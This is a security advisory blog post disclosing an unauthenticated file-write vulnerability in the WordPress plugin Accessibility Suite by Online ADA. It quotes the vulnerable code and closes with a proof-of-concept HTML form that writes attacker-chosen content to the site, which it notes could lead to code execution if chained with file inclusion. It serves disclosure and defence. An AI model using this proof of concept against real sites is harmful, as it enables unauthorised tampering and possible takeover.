Our Proactive Monitoring Caught a Restricted File Upload Vulnerability in Accessibility Suite by Online ADA
One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through that we caught a restricted file upload vulnerability in the plugin Accessibility Suite by Online ADA that would allow an attacker to write arbitrary content to file on the website. The file has a .png extension, so the vulnerability could be directly used to upload image the attacker wanted, it could also be combined with a local file inclusion (LFI) vulnerability to cause arbitrary code to run on the website.
Since our Plugin Security Checker checks for the same type of code, it will alert you if plugins you use possibly contain the same type vulnerable code (and possibly contain more serious vulnerable code). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Technical Details
The plugin makes the function save_snapshot() accessible through WordPress’ AJAX functionality to those logged in to WordPress as well as those not logged in:
400 401 | add_action("wp_ajax__oadaas__save_snapshot", __NAMESPACE__ . '\\save_snapshot'); add_action("wp_ajax_nopriv__oadaas__save_snapshot", __NAMESPACE__ . '\\save_snapshot'); |
It looks like it is only intended to be accessed by those logged in to WordPress though.
The function, which is located in the file /includes/ajax_functions/core.php, takes the value of POST input “b64”, base64 decodes and then saves it as the contents of the file /wp-content/uploads/oadaas/snapshot.png:
402 403 404 405 406 407 408 409 | function save_snapshot() { if (!isset($_POST["b64"])) return; $image_b64 = base64_decode($_POST["b64"]); $file = wp_upload_dir()["basedir"] . "/oadaas/snapshot.png"; $result = file_put_contents($file, $image_b64); echo wp_upload_dir()["baseurl"] . "/oadaas/snapshot.png"; |
Proof of Concept
The following proof of concept will write the specified content to the file /wp-content/uploads/oadaas/snapshot.png.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[base64 encoded content]” with the base64 encoded version of the content of the file.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=_oadaas__save_snapshot" method="POST" > <input type="hidden" name="b64" value="[base64 encoded content]" /> <input type="submit" value="Submit" /> </form> </body> </html>